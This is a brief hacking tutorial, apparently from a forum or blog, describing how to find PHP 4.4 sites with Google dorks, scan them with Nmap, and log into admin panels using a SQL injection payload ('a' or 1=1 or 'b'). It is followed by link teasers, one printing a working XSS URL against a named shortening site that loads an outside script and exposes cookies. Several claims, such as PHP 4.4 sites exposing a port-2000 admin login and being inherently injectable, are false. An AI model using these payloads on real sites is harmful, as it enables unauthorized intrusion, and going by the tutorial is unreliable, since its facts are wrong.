This tut Shows how to hack Sites running: Php 4.4 Sites.

Step 1 – Search for them

Yep,make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.

Step 2 – Scan them

Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.

Now just login using port 2000 ie –

and you will be comfortably login into admin page like this –

Step 3 – Hack them

Now in the fields,you have to type –

username – admin

password – a’ or 1=1 or ‘b

domain – a’ or 1=1 or ‘b

and press go,you will login into admin

voila..you have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.

credit: prohack

Explore More

critical XSS Vulnerability on Ygncos Shorten Url

PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me This vulnerability has been informed to :- webmaster Test Link http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E Cross-site scripting (XSS) is a type

Read More

DNS disaster: first attacks reported

The first attacks that are likely to have stemmed from a serious Domain Name System flaw have been reported. Dan Kaminsky (Credit: Kaminsky’s blog) The existence of the Domain Name

Read More

LFI/RFI testing and exploiting with fimap

fimap is currently under development but still usable. Feel free to test it! This document and tool is not recommend for people who doesn’t know what LFI/RFI is. If you

Read More